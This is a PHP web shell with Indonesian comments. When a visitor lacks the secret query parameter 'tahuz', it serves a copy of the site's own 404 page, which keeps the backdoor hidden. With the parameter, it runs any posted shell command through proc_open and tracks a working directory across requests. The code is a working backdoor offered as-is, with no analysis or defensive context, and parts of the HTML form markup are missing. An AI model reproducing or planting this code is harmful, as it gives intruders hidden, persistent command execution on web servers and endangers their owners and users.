session_start();

// Ambil domain saat ini (HTTP/HTTPS + host)
$scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https://" : "http://";
$host = $_SERVER['HTTP_HOST'];
$self_404 = $scheme . $host . "/s.php"; // file palsu yg pasti 404

// Jika ?tahuz tidak ada, tampilkan halaman 404 palsu dari situs ini
if (!isset($_GET['tahuz'])) {
$ch = curl_init($self_404);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_HEADER => true,
CURLOPT_NOBODY => false,
CURLOPT_USERAGENT => $_SERVER['HTTP_USER_AGENT'] ?? 'Mozilla/5.0'
]);
$resp = curl_exec($ch);
$headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

$header = substr($resp, 0, $headerSize);
$body = substr($resp, $headerSize);

foreach (explode("\r\n", $header) as $line) {
if (stripos($line, 'Content-Length') === 0 || stripos($line, 'Transfer-Encoding') === 0) continue;
header($line);
}
header("HTTP/1.1 $status");
echo $body;
exit;
}

// === SHELL MODE ===
if (!isset($_SESSION['cwd'])) {
$_SESSION['cwd'] = getcwd();
}
if (isset($_POST['cd']) && is_dir($_POST['cd'])) {
$_SESSION['cwd'] = realpath($_POST['cd']);
}
chdir($_SESSION['cwd']);
$cwd = getcwd();

// Jalankan perintah
$output = '';
if (isset($_POST['cmd'])) {
$desc = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
$p = proc_open($_POST['cmd'], $desc, $pipes);
if (is_resource($p)) {
$output = stream_get_contents($pipes[1]);
proc_close($p);
} else {
$output = "proc_open error";
}
}

<!DOCTYPE html>

Shell<meta charset="UTF-8"><title>Shell</title>
<body style="background:#000;color:#0f0;font-family:monospace;padding:20px;">

Shell Aktif | Dir: = htmlspecialchars($cwd)





<button>Ganti Direktori</button>




<button>Jalankan</button>


<pre>= htmlspecialchars($output) </pre>